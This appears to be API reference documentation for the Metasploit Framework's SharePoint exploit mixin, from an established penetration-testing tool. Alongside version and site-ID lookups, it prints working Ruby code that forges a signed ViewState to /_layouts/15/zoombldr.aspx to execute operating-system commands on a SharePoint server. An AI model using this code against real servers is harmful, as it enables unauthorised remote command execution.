Module: Msf::Exploit::Remote::HTTP::Sharepoint
- Includes:
- Msf::Exploit::Remote::HttpClient, ViewState
- Defined in:
- lib/msf/core/exploit/remote/http/sharepoint.rb
Overview
This module provides a way of interacting with sharepoint installations
Instance Attribute Summary
Attributes included from Msf::Exploit::Remote::HttpClient
Instance Method Summary collapse
-
#sharepoint_execute_command_via_viewstate(cmd, validation_key, http_request_opts = {}) ⇒ nil
Execute an operating system command by crafting and sending a viewstate to the remote server.
-
#sharepoint_get_site_web_id(http_request_opts = {}) ⇒ String?
Get the site’s webID.
-
#sharepoint_get_version(http_request_opts = {}) ⇒ Rex::Version?
Get the SharePoint version number.
Methods included from ViewState
#can_sign_viewstate?, #decode_viewstate, #extract_viewstate, #extract_viewstate_generator, #extract_viewstate_validation_key, #generate_viewstate, #generate_viewstate_hmac, #generate_viewstate_payload, #initialize, #pack_viewstate_generator, #pack_viewstate_validation_key
Methods included from Msf::Exploit::Remote::HttpClient
#basic_auth, #cleanup, #configure_http_login_scanner, #connect, #connect_ws, #deregister_http_client_options, #disconnect, #download, #full_uri, #handler, #http_fingerprint, #initialize, #lookup_http_fingerprints, #normalize_uri, #path_from_uri, #peer, #proxies, #reconfig_redirect_opts!, #request_opts_from_url, #request_url, #rhost, #rport, #send_request_cgi, #send_request_cgi!, #send_request_raw, #service_details, #setup, #ssl, #ssl_version, #strip_tags, #target_uri, #validate_fingerprint, #vhost
Methods included from Auxiliary::Report
#active_db?, #create_cracked_credential, #create_credential, #create_credential_and_login, #create_credential_login, #db, #db_warning_given?, #get_client, #get_host, #inside_workspace_boundary?, #invalidate_login, #mytask, #myworkspace, #myworkspace_id, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot
Methods included from Metasploit::Framework::Require
optionally, optionally_active_record_railtie, optionally_include_metasploit_credential_creation, #optionally_include_metasploit_credential_creation, optionally_require_metasploit_db_gem_engines
Instance Method Details
#sharepoint_execute_command_via_viewstate(cmd, validation_key, http_request_opts = {}) ⇒ nil
Execute an operating system command by crafting and sending a viewstate to the remote server. In order for this to work, the validation_key must be known.
24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 |
# File 'lib/msf/core/exploit/remote/http/sharepoint.rb', line 24 def sharepoint_execute_command_via_viewstate(cmd, validation_key, http_request_opts = {}) vprint_status("Executing command: #{cmd}") res = send_request_cgi(http_request_opts.merge({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'), 'vars_post' => { '__VIEWSTATE' => generate_viewstate_payload( cmd, extra: pack_viewstate_generator('63E6434F'), # /_layouts/15/zoombldr.aspx algo: 'sha256', key: pack_viewstate_validation_key(validation_key) ) } })) unless res fail_with(Failure::Unreachable, "Target did not respond to #{__method__}") end unless res.code == 200 fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}") end vprint_good('Successfully executed command') end |
#sharepoint_get_site_web_id(http_request_opts = {}) ⇒ String?
Get the site’s webID.
55 56 57 58 59 60 61 62 63 64 |
# File 'lib/msf/core/exploit/remote/http/sharepoint.rb', line 55 def sharepoint_get_site_web_id(http_request_opts = {}) res = send_request_cgi(http_request_opts.merge({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '_api', 'web', 'id') })) return nil unless res&.code == 200 res.get_xml_document.at('//d:Id')&.text end |
#sharepoint_get_version(http_request_opts = {}) ⇒ Rex::Version?
Get the SharePoint version number.
72 73 74 75 76 77 78 79 80 81 |
# File 'lib/msf/core/exploit/remote/http/sharepoint.rb', line 72 def sharepoint_get_version(http_request_opts = {}) res = send_request_cgi(http_request_opts.merge({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) })) return nil unless /^(?<build>[\d.]+)/ =~ res&.headers['MicrosoftSharePointTeamServices'] Rex::Version.new(build) end |